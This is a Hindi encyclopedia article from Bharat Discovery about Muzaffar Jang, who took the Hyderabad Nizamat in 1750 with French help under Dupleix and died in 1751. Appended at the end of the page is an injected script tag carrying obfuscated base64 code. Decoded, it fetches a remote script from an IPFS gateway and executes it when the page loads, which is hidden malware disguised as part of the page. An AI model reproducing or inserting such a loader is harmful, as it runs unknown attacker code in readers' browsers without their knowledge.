मुजफ़्फ़र जंग

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.

मुजफ़्फ़र जंग निज़ामुलमुल्क चिनकिलिच ख़ाँ का 'दौहित्र' [1] था। निज़ाम की मृत्यु के उपरान्त 1748 ई. में वह अपने मामा नासिर जंग के स्थान पर हैदराबाद की गद्दी का दावेदार बना।

  • मुजफ़्फ़र जंग ने डूप्ले के अधीन फ़्राँसीसियों का समर्थन प्राप्त करने में सफलता पाई थी।
  • उसे चन्दा साहब के समान मित्र भी मिला, जो अर्काट की गद्दी का दावेदार था।
  • 1750 ई. में नासिर जंग की हत्या कर दी गई थी और फ़्राँसीसियों की सहायता से मुजफ़्फ़र जंग को निज़ामत मिल गई।
  • फ़्राँसीसियों की इस मदद के बदले मुजफ़्फ़र जंग ने उन्हें विशेष सुविधाएँ प्रदान कीं।
  • 1751 ई. में एक आकस्मिक मुठभेड़ में मुजफ़्फ़र जंग मारा गया और हैदराबाद की गद्दी उसके तीसरे मामा सलावत जंग के अधिकार में आ गई।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

भारतीय इतिहास कोश |लेखक: सच्चिदानन्द भट्टाचार्य |प्रकाशक: उत्तर प्रदेश हिन्दी संस्थान |पृष्ठ संख्या: 371 |

  1. लड़की का लड़का, नाती, नवाषा

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>